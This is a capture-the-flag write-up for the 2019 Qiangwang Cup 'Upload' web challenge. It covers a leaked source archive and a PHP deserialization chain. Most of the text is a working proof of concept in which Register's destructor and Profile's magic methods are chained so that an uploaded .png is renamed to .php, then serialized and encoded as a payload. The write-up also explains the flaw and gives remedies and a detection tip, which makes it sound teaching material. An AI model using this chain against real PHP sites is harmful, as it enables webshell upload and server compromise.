Table of Contents
Challenge practice record: [Qiangwang Cup ("Strong Network Cup") 2019] Upload
Challenge reproduction link: https://buuoj.cn/challenges
Reference link: 3rd Qiangwang Cup (2019), Web challenges write-up + reproduction environment
I. Key points
1. Source code leak
www.tar.gz
2. PHP deserialization
The archive contains what looks like a lot of files, but when the project is opened in PhpStorm, the files that open by default carry two breakpoints. These are in fact the hint: they mark the places where deserialization comes into play. From there, building the deserialization chain is routine and not difficult.
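The only caveat is that the namespace is serialized as part of the class name, so the PoC must declare it at the top: `namespace app\web\controller;`. The underlying weakness is that the application unserializes data it does not control, which makes the magic methods of its own classes (`__destruct`, `__call`, `__get`) reachable; the usual remedies are to avoid `unserialize()` on such data (for example by using JSON) or to restrict it with the `allowed_classes` option.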
<?php
namespace app\web\controller;
/**
 * Stand-in for the Profile class as reproduced in this write-up.
 *
 * Only the property list and the magic methods are present here. The property
 * declarations keep their original order on purpose: serialize() emits
 * declared properties in declaration order, so reordering them would change
 * the serialized string.
 *
 * Review note: __get() and __call() together let plain property values decide
 * which method gets invoked. That is harmless while the object state is set by
 * trusted code, and it becomes the weak point as soon as instances can be
 * created by unserialize() from client-supplied data.
 */
class Profile
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;

    public function __construct()
    {
        // Deliberately empty: every property starts out as null.
    }

    /**
     * Resolves a read of an inaccessible property through the $except map.
     *
     * @param string $name property name that was requested
     * @return mixed the entry stored in $except under that name
     */
    public function __get($name)
    {
        $aliases = $this->except;

        return $aliases[$name];
    }

    /**
     * Handles calls to methods that do not exist on this object.
     *
     * The property named like the missing method is read (falling back to
     * __get() when it is not a declared property). A truthy value is then
     * used as the name of the method to call, with the original argument
     * list passed on as one array argument.
     *
     * @param string $name      name of the method that was called
     * @param array  $arguments arguments given to that call
     */
    public function __call($name, $arguments)
    {
        $next = $this->{$name};
        if (!$next) {
            return;
        }

        // The method name comes from object state, not from the code.
        $this->{$next}($arguments);
    }
}
/**
 * Stand-in for the Register class as reproduced in this write-up.
 *
 * Review note: the destructor calls a method on whatever object is stored in
 * $checker. Destructors also run for objects created by unserialize(), so
 * both properties are client-chosen if serialized input is accepted from the
 * client.
 */
class Register
{
    public $checker;
    public $registed;

    public function __construct()
    {
        // Deliberately empty: both properties start out as null.
    }

    /**
     * Calls index() on $checker unless $registed is truthy.
     */
    public function __destruct()
    {
        if ($this->registed) {
            return;
        }

        $this->checker->index();
    }
}
// Inner object. Only its property values end up in the serialized string.
// upload_img is not defined in this listing; presumably it is a method of the
// challenge's real Profile class (not shown on this page).
$profile = new Profile();
$profile->filename_tmp = "./upload/f4e7685fe689f675c85caeefaedcf40c/00bf23e130fa1e525e332ff03dae345d.png";
$profile->filename = "./upload/f4e7685fe689f675c85caeefaedcf40c/00bf23e130fa1e525e332ff03dae345d.php";
$profile->ext = true;
$profile->img = "upload_img";
$profile->except = ['index' => 'img'];

// Outer object: with registed === false its destructor calls index() on $checker.
$register = new Register();
$register->checker = $profile;
$register->registed = false;

// Output is serialize() -> base64 -> URL-encoding. For defenders: client input
// that base64-decodes to a PHP serialized object (it starts with O:<length>:"
// followed by a namespaced class name) is the signal to look for in request logs.
$serialized = serialize($register);
echo urlencode(base64_encode($serialized));